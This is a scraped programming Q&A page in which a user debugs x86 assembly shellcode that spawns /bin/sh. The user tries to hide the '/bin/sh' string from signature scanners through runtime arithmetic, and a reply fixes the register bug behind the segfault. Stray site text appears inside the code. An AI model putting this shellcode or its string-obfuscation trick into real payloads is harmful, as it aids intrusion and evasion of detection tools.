I have this working shellcode that spawns a shell I have to modify it such that I hide "/bin/sh" or "sh" coming anywhere in the binary after compiling. I have hence thought of taking the hex value of /bin/sh(2f 62 69 6e 2f 73 68) adding some random value to it say 0x11111 and moving that value to a register, subtracting 0x11111 at runtime and then pushing that runtime generated value(which becomes /bin/sh) into the stack and doing an execv But i get a segmentation fault on the 1st step itself. and i am unable to figure out why?
This below code works fine.
section .data
section .text
global _start
_start:
xor eax,eax
cdq
push eax
push long 0x68732f2f
push 开发者_C百科long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80
But this change causes a segmentation fault
section .data
section .text
global _start
_start:
xor eax,eax
cdq
push eax
mov ecx,0x11111
mov ebx,0x68744040
sub ebx,ecx
push long eax
push long 0x6e69622f
mov ebx,esp
push eax
push ebx
mov ecx,esp
mov al,0xb
xor edx,edx
int 0x80
Please help me on thie. Will be greatful. Thanks
The code is different, isn't it? Look here:
sub ebx,ecx
push long eax
You compute ebx-ecx, but push eax. And eax is zero.
It should be:
sub ebx,ecx
push long ebx
![Interactive visualization of a graph in python [closed]](https://www.devze.com/res/2023/04-10/09/92d32fe8c0d22fb96bd6f6e8b7d1f457.gif)
加载中,请稍侯......
精彩评论